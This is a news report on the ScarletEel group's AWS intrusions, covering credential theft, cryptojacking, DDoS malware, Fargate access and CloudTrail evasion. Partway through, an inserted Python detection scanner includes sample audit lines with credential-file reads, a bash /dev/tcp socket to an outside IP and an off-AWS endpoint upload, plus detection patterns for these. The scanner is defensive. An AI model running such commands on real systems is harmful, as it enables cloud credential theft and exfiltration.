Amazon Web Services (AWS) threatened by ScarletEel hackers
ScarletEel hackers were able to break into the AWS cloud to steal credentials and intellectual property, and to perform cryptojacking, DDoS, and more. AWS responds with a major update.
Researchers observed ScarletEel hackers infiltrating Amazon Web Services (AWS) to steal credentials and intellectual property, install crypto mining software, perform distributed denial-of-service (DDoS) attacks, and more.
The group was first revealed in a February blog post from cloud security company Sysdig. ScarletEel has proven itself proficient with AWS tools, so much so that it plugs into the cloud environment and uses native AWS functionality to move around with ease, performing a double whammy: installing crypto mining software while also stealing intellectual property.
ScarletEel also continues to refine its tactics. According to the company’s latest analysis, it manages to evade cloud security detection mechanisms and reach the AWS Fargate compute engine. It has also expanded its arsenal by adding DDoS-as-a-service to its list of intrusion and exploitation techniques.
“So, compared to their previous activity, we see that they are more aware of the victim’s environment and they have improved their capabilities in terms of where to go, how to exploit it and how to evade the security defenses that customers have already started implementing,” says Alessandro Brucato, threat research engineer for Sysdig.
ScarletEel began its latest intrusion by exploiting Jupyter notebook containers in a Kubernetes cluster; the hackers then ran scripts to look for AWS credentials that they could send to their command-and-control (C2) server. Essentially, instead of using command-line tools, the scripts used the shell’s built-in commands. “This is a less visible way to exfiltrate data since curl and wget, which many tools monitor, are not used,” the researchers pointed out.
ScarletEel also used Pacu, an open source tool for AWS, to discover a privilege escalation opportunity in the victim’s account. At the same time, it used Peirates, an equivalent tool for exploring and exploiting the victim’s Kubernetes environment.
To disguise their activity, the hackers devised an ingenious evasion mechanism.
“Instead of dealing directly with AWS, they were using a Russian server that supports the AWS protocol,” explains Michael Clark, director of threat research for Sysdig. This living-off-the-land approach, using native AWS commands, masks the malicious nature of the activity and at the same time keeps it out of the victim’s AWS CloudTrail logs, because all of it went to the Russian server.
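The two evasion tricks described above, harvesting credentials with shell builtins instead of curl or wget, and sending AWS API calls to a non-AWS endpoint so that CloudTrail never records them, still leave traces on the host even though they stay out of CloudTrail. The following is an added example, not code from the article or from Sysdig: a small Python scanner that runs over constructed process-audit lines and flags those host-side traces. The "pid user command" event format, the indicator patterns and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import urlparse

# Constructed sample audit lines in the shape "<pid> <user> <command line>".
# These are made-up events for the example, not data from the Sysdig report.
SAMPLE_EVENTS = [
    "1201 root cat /root/.aws/credentials",
    "1202 root bash -c 'exec 3<>/dev/tcp/203.0.113.10/443'",
    "1203 root sh -c 'echo $AWS_SECRET_ACCESS_KEY'",
    "1204 root bash -c 'exec 3<>/dev/tcp/169.254.170.2/80'",
    "1205 root aws s3 cp /tmp/src.tar.gz s3://bucket/ --endpoint-url https://s3.storage.example",
    "1206 root aws s3 ls --endpoint-url https://s3.eu-west-1.amazonaws.com",
    "1207 app python3 /app/server.py",
]

# Assumed indicators of credential harvesting: the CLI credential file, the
# secret-key environment variable, and the EC2 / ECS-Fargate metadata endpoints.
CREDENTIAL_SOURCES = re.compile(
    r"\.aws/credentials|AWS_SECRET_ACCESS_KEY|169\.254\.169\.254|169\.254\.170\.2"
)
# bash's /dev/tcp and /dev/udp pseudo-devices let a script open a socket with
# shell builtins alone, i.e. with no curl or wget process for a tool to notice.
SHELL_SOCKET = re.compile(r"/dev/(tcp|udp)/")
# Endpoint overrides accepted by the AWS CLI and SDKs (flag or environment variable).
ENDPOINT_OVERRIDE = re.compile(r"(?:--endpoint-url[= ]|AWS_ENDPOINT_URL=)(\S+)")


def endpoint_is_foreign(url: str) -> bool:
    """True when an endpoint override points at a host that is not AWS itself.
    API calls sent to such a host never appear in the account's CloudTrail."""
    host = urlparse(url).hostname
    return host is None or not host.endswith(".amazonaws.com")


def classify(command_line: str) -> list[str]:
    """Return the finding tags that apply to one process command line."""
    tags = []
    if CREDENTIAL_SOURCES.search(command_line):
        tags.append("credential-source-access")
    if SHELL_SOCKET.search(command_line):
        tags.append("shell-builtin-network")
    match = ENDPOINT_OVERRIDE.search(command_line)
    if match and endpoint_is_foreign(match.group(1).strip("'\"")):
        tags.append("non-aws-endpoint")
    return tags


def scan(events: list[str]) -> dict[str, list[str]]:
    """Map pid -> findings for every event line that triggers at least one rule."""
    findings = {}
    for line in events:
        pid, _user, command_line = line.split(" ", 2)
        tags = classify(command_line)
        if tags:
            findings[pid] = tags
    return findings


if __name__ == "__main__":
    for pid, tags in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(tags))
```

The point of the three rules is that each one fires on something the host records regardless of what CloudTrail sees: the file or metadata address being read, the socket opened without a separate network process, and the endpoint the AWS client was told to use. A genuine AWS endpoint (pid 1206) is left alone; the same command with a third-party endpoint (pid 1205) is flagged.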
As Sysdig wrote in February, ScarletEel’s main goals are to steal proprietary software and perform cryptojacking.
Recently, the hackers ran 42 crypto mining instances through a compromised account, which created so much noise that they were quickly detected and shut down. The attackers were not deterred: even after being discovered, they still attempted to use other newly compromised accounts, but failed for lack of privileges.
The researchers estimated that if the attack had continued unabated, it would have yielded approximately $4,000 per day in cryptomining rewards.
In addition to IP theft and cryptojacking, the group also installed malware belonging to the Mirai family of botnets (Mirai is one of the most famous botnets in the world, having been around since the mid-2010s) called “Pandora”. The researchers hypothesized that the hackers would use Pandora-infected devices as part of a separate, larger DDoS-as-a-service campaign.
“Ordinary” cloud security may not be a match for an attacker so comfortable in these environments. In its most recent activity, for example, ScarletEel’s increased capabilities allowed it to reach Fargate, the AWS platform for running serverless containers.
Fargate is largely uncharted territory for both hackers and those needing to defend themselves because, Clark explains, “it is often not publicly accessible. It is used for many internal and back-end purposes, which means that it is not really considered as part of their attack surface.”
He adds: “But as we saw with this attack, they ended up on the Fargate system and took the credentials from it. So they’re definitely aware of the opportunities that are in that space, and it’s just a matter of time before they get there.”
To protect yourself against an entity like ScarletEel, Brucato explained, “you have to first implement some measures to prevent hackers from entering your environment. But if they can do it anyway – because now they’re getting more and more sophisticated – you also have to implement effective runtime security.” Clark highlights the value of effective cloud security posture management (CSPM) and cloud infrastructure entitlement management (CIEM).
“It is not enough to protect yourself in just one way because attackers today are truly aware,” concludes Brucato. “They can exploit any other detail.”